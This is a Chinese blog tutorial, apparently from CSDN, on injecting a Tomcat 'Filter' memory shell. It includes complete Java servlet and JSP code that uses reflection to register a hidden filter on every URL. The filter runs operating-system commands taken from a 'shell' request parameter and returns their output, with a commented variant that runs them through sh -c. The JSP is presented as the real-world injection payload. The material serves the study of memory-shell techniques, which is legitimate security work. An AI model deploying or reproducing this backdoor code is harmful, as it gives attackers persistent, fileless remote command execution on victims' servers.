Java Filter 型内存马调试系列 (二)

最新推荐文章于 2024-05-17 01:46:23 发布
最新推荐文章于 2024-05-17 01:46:23 发布
阅读量10w+ 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 内存马 网络安全 Java 文章标签: java 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/leeezp/article/details/126360210

在上一篇文章 https://blog.youkuaiyun.com/leeezp/article/details/126303979 中简单讲述了新建一个java filter 和 servlet 及 filter 的调用顺序。web容器通过xml配置文件或注解知道这个类是一个过滤器类。(本文依赖的jar和上一篇文章一致,这里不再赘述)

内存马在实际渗透中的利用方法是找到一个注入点,动态的在内存中创建一个Filter对象。

那么,如何不使用xml和注解,动态创建并调用filter呢?

tomcat filter 的流程:

ApplicationFilterChain(记录了所有filter的信息)--将$this->filter--》filterConfig(获得了一个filter的相关信息)--filterConfig.filter--》filter
--doFilter--》调用自定义filter中的恶意代码

 网上找了一张 servlet 的关系图:

 

 可知 filterConfig 可以由 StandardContext 控制。

0x00

我们先写一个demo实现上图前三步的创建,使用官方提供的方法:

创建一个servlet,

TomcatServletTest.java
import org.apache.catalina.core.ApplicationContext;
import org.apache.catalina.core.ApplicationContextFacade;

import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;
import java.lang.reflect.Field;

@WebServlet(name = "TomcatServletTest", urlPatterns = "/tomcatServletTest")
public class TomcatServletTest extends HttpServlet {
    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {

    }

    protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        PrintWriter writer = response.getWriter();
        try {
            ServletContext servletContext = request.getServletContext();
            ApplicationContextFacade applicationContextFacade = (ApplicationContextFacade) servletContext;
            Class<ApplicationContextFacade> applicationContextFacadeClass = ApplicationContextFacade.class;
            Field applicationContextField = applicationContextFacadeClass.getDeclaredField("context");
            applicationContextField.setAccessible(true);
            Object applicationContextObj = applicationContextField.get(applicationContextFacade);
            ApplicationContext applicationContext = (ApplicationContext) applicationContextObj;
            Class<ApplicationContext> applicationContextClass = ApplicationContext.class;
            Field standardContextField = applicationContextClass.getDeclaredField("context");
            standardContextField.setAccessible(true);
            Object standardContextObj = standardContextField.get(applicationContext);
            writer.append("ServletContext instance's class is: ")
                    .append(servletContext.getClass().getCanonicalName())
                    .append("\r\n")
                    .append("\r\n")
                    .append("ApplicationContext instance's class is: ")
                    .append(applicationContextObj.getClass().getCanonicalName())
                    .append("\r\n")
                    .append("\r\n")
                    .append("StandardContext instance's class is:")  
                    .append(standardContextObj.getClass().getCanonicalName());
        } catch (Exception e) {
            e.printStackTrace(writer);
        }
    }
}

 0x01 通过servlet动态创建一个filter

Servlet0811.java
import org.apache.catalina.Context;
import org.apache.catalina.core.ApplicationContext;
import org.apache.catalina.core.ApplicationContextFacade;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.core.StandardContext;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;

import javax.servlet.*;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.InputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
import java.util.Scanner;
import java.util.logging.Logger;

@WebServlet(urlPatterns = "/Filter07")
public class Servlet0811 extends HttpServlet {
    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        //反射创建servletContext
        ServletContext servletContext = request.getServletContext();
        ApplicationContextFacade applicationContextFacade = (ApplicationContextFacade) servletContext;
        try {
            Field applicationContextFacadeContext = applicationContextFacade.getClass().getDeclaredField("context");
            applicationContextFacadeContext.setAccessible(true);  //设置在使用构造器的时候不执行权限检查 表示不检测方法是否为public或者private,否则抛出异常 Class Servlet0811 can not access a member of class org.apache.catalina.core.StandardContext with modifiers "private"
            //反射创建applicationContext
            ApplicationContext applicationContext = (ApplicationContext) applicationContextFacadeContext.get(applicationContextFacade);
            Field applicationContextContext = applicationContext.getClass().getDeclaredField("context");
            applicationContextContext.setAccessible(true);
            //反射创建standardContext
            StandardContext standardContext = (StandardContext) applicationContextContext.get(applicationContext);

            //创建filterConfigs
            Field filterConfigs = standardContext.getClass().getDeclaredField("filterConfigs");
            filterConfigs.setAccessible(true);
            HashMap hashMap = (HashMap) filterConfigs.get(standardContext); // 获取所有filters
            String filtername = "Filter";
            if (hashMap.get(filtername) == null) {  // 首次加载没有这个filter
                Filter filter = new Filter() {
                    @Override
                    public void init(FilterConfig filterConfig) throws ServletException {
                        Logger log = Logger.getLogger("Filter"); //import java.util.logging.Logger;
                        log.info("注入初始化");

                    }

                    @Override
                    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
                        servletRequest.setCharacterEncoding("utf-8");
                        servletResponse.setCharacterEncoding("utf-8");
                        servletResponse.setContentType("text/html;charset=UTF-8");
                        filterChain.doFilter(servletRequest, servletResponse);         // 加这句话为了不影响原程序功能,把filter向后传递


                        HttpServletRequest req = (HttpServletRequest) request;
                        InputStream in = Runtime.getRuntime().exec(req.getParameter("shell")).getInputStream();
                        Scanner s = new Scanner(in).useDelimiter("\\A");
                        String output = s.hasNext() ? s.next() : "";
                        response.getWriter().write(output);
                        Logger log = Logger.getLogger("Filter"); //import java.util.logging.Logger;
                        log.info("过滤中...");
                    }

                    @Override
                    public void destroy() {
                        Logger log = Logger.getLogger("Filter"); //import java.util.logging.Logger;
                        log.info("destroy");
                    }
                };

                //构造filterDef对象
                FilterDef filterDef = new FilterDef();
                filterDef.setFilter(filter);
                filterDef.setFilterName(filtername);
                filterDef.setFilterClass(filter.getClass().getName());
                standardContext.addFilterDef(filterDef);

                //构造filterMap对象
                FilterMap filterMap = new FilterMap();
                filterMap.addURLPattern("/*");
                filterMap.setFilterName(filtername);
                filterMap.setDispatcher(DispatcherType.REQUEST.name());
                standardContext.addFilterMapBefore(filterMap);

                //构造filterConfig
                Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
                constructor.setAccessible(true);
                ApplicationFilterConfig applicationFilterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef); // 调用 new Filter(){ init(FilterConfig filterConfig) }

                //将filterConfig添加到filterConfigs中,即可完成注入
                hashMap.put(filtername, applicationFilterConfig);
                response.getWriter().println("success");
            }


        } catch (NoSuchFieldException | IllegalAccessException | NoSuchMethodException e) {
            e.printStackTrace();
        } catch (InvocationTargetException e) {
            e.printStackTrace();
        } catch (InstantiationException e) {
            e.printStackTrace();
        }


    }

    protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        this.doPost(request, response);
    }
}

首次访问,注入内存马成功:

 继续访问内存马,执行命令:

如果你感兴趣filter的执行调用顺序, 我在程序里打了断点调试,你可以尝试下断点分析,我的断点截图如下:

 

0x02 实战注入内存马

实战中不会依赖于xml或注解,通过jsp方式可以实现动态注入一个内存马。

index.jsp

<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.Context" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="org.apache.catalina.core.ApplicationContextFacade" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="java.util.HashMap" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.util.logging.Logger" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.util.Scanner" %>
<%
    //反射创建servletContext
    ServletContext servletContext = request.getServletContext();
    ApplicationContextFacade applicationContextFacade = (ApplicationContextFacade) servletContext;
    Field applicationContextFacadeContext = applicationContextFacade.getClass().getDeclaredField("context");
    applicationContextFacadeContext.setAccessible(true);
    //反射创建applicationContext
    ApplicationContext applicationContext = (ApplicationContext) applicationContextFacadeContext.get(applicationContextFacade);
    Field applicationContextContext = applicationContext.getClass().getDeclaredField("context");
    applicationContextContext.setAccessible(true);
    //反射创建standardContext
    StandardContext standardContext = (StandardContext) applicationContextContext.get(applicationContext);


    //创建filterConfigs
    Field filterConfigs = standardContext.getClass().getDeclaredField("filterConfigs");
    filterConfigs.setAccessible(true);
    HashMap hashMap = (HashMap) filterConfigs.get(standardContext);
    String filterName = "Filter";
    if (hashMap.get(filterName) == null) {


        Filter filter = new Filter() {
            @Override
            public void init(FilterConfig filterConfig) throws ServletException {
                Logger log = Logger.getLogger("Filter");
                log.info("注入初始化");
            }


            @Override
            public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
                servletRequest.setCharacterEncoding("utf-8");
                servletResponse.setCharacterEncoding("utf-8");
                servletResponse.setContentType("text/html;charset=UTF-8");
                filterChain.doFilter(servletRequest, servletResponse);
                HttpServletRequest req = (HttpServletRequest) request;
                // 获取单个命令的返回结果
                InputStream in = Runtime.getRuntime().exec(req.getParameter("shell")).getInputStream();
                Scanner s = new Scanner(in).useDelimiter("\\A");
                String output = s.hasNext() ? s.next() : "";
                response.getWriter().write(output);

                /* 获取多个命令的返回结果   // ?shell=whoami%20%26%20id
                String param=req.getParameter("shell");
                InputStream in = Runtime.getRuntime().exec(new String[]{"sh", "-c",param}).getInputStream();
                BufferedReader reader = new BufferedReader(new InputStreamReader(in));
                String line;
                while((line = reader.readLine())!= null){
                    response.getWriter().write(line);
                }
                */

                Logger log = Logger.getLogger("Filter");
                log.info("过滤中");
            }


            @Override
            public void destroy() {
            }
        };
        //构造filterDef对象
        FilterDef filterDef = new FilterDef();
        filterDef.setFilter(filter);
        filterDef.setFilterName(filterName);
        filterDef.setFilterClass(filter.getClass().getName());
        standardContext.addFilterDef(filterDef);


        //构造filterMap对象
        FilterMap filterMap = new FilterMap();
        filterMap.addURLPattern("/*");
        filterMap.setFilterName(filterName);
        filterMap.setDispatcher(DispatcherType.REQUEST.name());
        standardContext.addFilterMapBefore(filterMap);


        //构造filterConfig
        Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
        constructor.setAccessible(true);
        ApplicationFilterConfig applicationFilterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);


        //将filterConfig添加到filterConfigs中,即可完成注入
        hashMap.put(filterName, applicationFilterConfig);
        response.getWriter().println("successfully");
    }
%>

这段代码 和 0x01 里写的基本一致,只是将代码从servlet移植到了jsp,代码里默认开启的是

Runtime.getRuntime().exec()

获取单个命令的返回值的方法,在注释里也给出了获取多个命令返回值的方法。

 

 

基于filter内存
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-09 1389
FilterMaps:存放 FilterMap 的数组,在 FilterMap 中主要存放了 FilterName 和 对应的 URLPattern,只要我们将filterFilterDefs,FilterMaps添加到FilterConfigs中就可以添加filter了。又回到之前ApplicationFilterFactory里,这里会返回filterChain这个对象,如果我们直接filterConfig的内容,是不是就能在filterChain调用addFilter时,将filter添加进去。
Java Filter 内存调试系列 ()_filter 内存 调试
2401_84968665的博客
05-17 444
本文是通过实例让大家对内存有一个初步清晰的认知,理解Java Servlet 与 Filter的 使用。前置知识:会发布一个IDEA web项目,具体操作参考我上一篇博客。
Java Filter 内存调试系列 ()
热门推荐
leeezp的博客
08-12 34万+
网上缺少适合java初学者的优秀的内存调试学习的教程,自己也想把知识做一个提炼总结记录下来,特次打算做一个系列教程。本文是通过实例让大家对内存有一个初步清晰的认知,理解Java Servlet 与 Filter的 使用。.........
Filter内存浅析
angry_program的博客
05-11 2465
1. 何谓内存? 以Tomcat为例,内存主要利用了Tomcat的部分组件会在内存中长期驻留的特性,只要将我们的恶意组件注入其中,就可以一直生效,直到容器重启。 Java内存shell有很多种,大致分为: 1. 动态注册filter 2. 动态注册servlet 3. 动态注册listener 4. 基于Java agent拦截修改关键类字节码实现内存shell 该文主要研究Filter内存的原理和实现。 2. Filter注册流程 假设有一个需要注册的filter类——F.
Java内存学习--Filter内存
zyer
08-04 1110
Filter内存,入门级
Tomcat内存学习1:Filter
weixin_43263451的博客
07-20 1361
传统的JSP木特征性强,且需要文件落地,容易被查杀。因此现在出现了内存技术。Java内存又称”无文件”,相较于传统的JSP木,其最大的特点就是无文件落地,存在于内存之中,隐蔽性强。filter内存就是通过动态添加恶意filter组件到正在运行的Tomcat服务器中。导致http请求通过该filter时会执行该filter的恶意代码今天说的时Tomcat内存,其大概分为以下三类FilterServletListener内存利用条件。...
Java Filter 内存调试系列 ()_applicationfilterconfig
最新发布
2401_84968940的博客
05-17 363
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Java Filter 内存调试系列 ()_filter 内存 调试(1)
2401_84968643的博客
05-17 535
如果使用了 filterChain.doFilter(servletRequest, servletResponse) ,则必须有 Servlet 且 Servlet 和 Filter 过滤的URL相同,分别用 @WebFilter 和 @WebServlet 注解。注意,chain.doFilter将请求转发给过滤器链下一个filter,如果没有filter那就是转发给Servlet。response.getWriter().println(“执行MyServlet–doPost方法。
Java Filter 内存调试系列 ()——一种Tomcat全版本获取StandardContext的新方法(全网首次发布,精调无错版)_standardcontext获取(1)
2401_84968693的博客
05-17 412
【代码】Java Filter 内存调试系列 ()——一种Tomcat全版本获取StandardContext的新方法(全网首次发布,精调无错版)_standardcontext获取(1)
DirectShow Filter调试方法
skywalker_ll的博客
01-12 1329
DirectShow Filter调试方法关键字 DirectShow Filter Debug原作者姓名 陆其明文章原始出处 http://jemylu.spaces.live.com/ 介绍经常有人会问,我的Filter已经开发好了,但怎么来调试呢?怎么让程序在Filter代码上单步执行呢?其实,这个很容易做到。下面我就来讲一些具体的步骤吧。 正文经常有人会问,我的Filter已经
Java内存学习-Filter
cjdgg的博客
05-03 990
Java内存学习-FliterTomcat架构学习 Tomcat架构学习 Server: Server,即指的WEB服务器,一个Server包括多个Service。 Service: Service的作用是在Connector和Engine外面包了一层(可看上图),把它们组装在一起,对外提供服务。一个Service可以包含多个Connector,但是只能包含一个Engine,其中Connector的作用是从客户端接收请求,Engine的作用是处理接收进来的请求。后面再来细节分析Service。 Conne
tomcat Filter内存
weixin_45682070的博客
02-16 1482
Tomcat Filter 流程分析 首先创建一个javaWeb项目,再把tomcat/lib/catalina.jar和tomcat/lib/servlet-api.jar添加到项目中,创建一个demo文件。如果不会的化可以参考这篇文章 demo package filter; import javax.servlet.*; import java.io.IOException; public class filterDemo implements Filter { public void
Tomcat Filter内存与查杀技术学习
wangluoanquan111的博客
08-04 1317
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
内存初探-Filter
qq_31065143的博客
04-18 1294
内存初探-Filter Tomcat简介 tomcat其实质上就是一个大点的servlet容器,那什么是容器呢,我觉得其实就是一个类。在tomcat中各个容器之间嵌套。而这些容器都是有生命周期的java类,都继承了共同的接口Lifecycle,所以Lifecycle就是这些容器的顶层接口。下面来谈谈存在哪些容器。 容器 init()方法:初始化容器组件,它必须在启动容器之前调用。它会创建许多对象。 start():启动容器,比如启动一个Server。 stop():停止执行 destroy():销毁这个
[JAVA安全]filter 内存
snowlyzz的博客
01-11 643
Filter 内存学习笔记
java Filter内存分析
zkaqlaoniao的博客
12-20 490
内存就是无文件木,无文件落地,它通常会存在进程,内存或者java虚拟机中,特点更加隐蔽,难以排查,并且也难以删除。而今天学习的Filter内存是传统web应用内存,主要将恶意代码注入到过滤器中,当过滤器拦截servlet请求的参数时,过滤器中的恶意代码就会执行。
Java内存学习--Filter内存——前置概念
zyer
08-04 365
Filter内存
Filter的注册与调试
SP_daiyq的专栏
08-03 1192
手动注册: 打开命令行提示,进入到相应的filter的目录下 注册: regsvr32 filter.ax 注销: regsvr32 /u filter.ax 自动注册: VC++编译filter的时候可以通过设置实现自动注册,Project --> Set
调试filter的配置 2010-8-12 14:35
laohu6599的专栏
01-09 460
其实和调试dll没什么两样,.ax看着就是.dll换了个外套一样(就我目前的水平看来,可能有理解不对的地方)。步骤如下: 1:将编译成功的filter注册进系统,然后用graphedit看下是否注册成功。 2:在编译环境中(我的是VC6.0)的Project Settings选项卡中Debug选项里面的Executable for debug session下面选入你的调用dll的应用程序,一
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值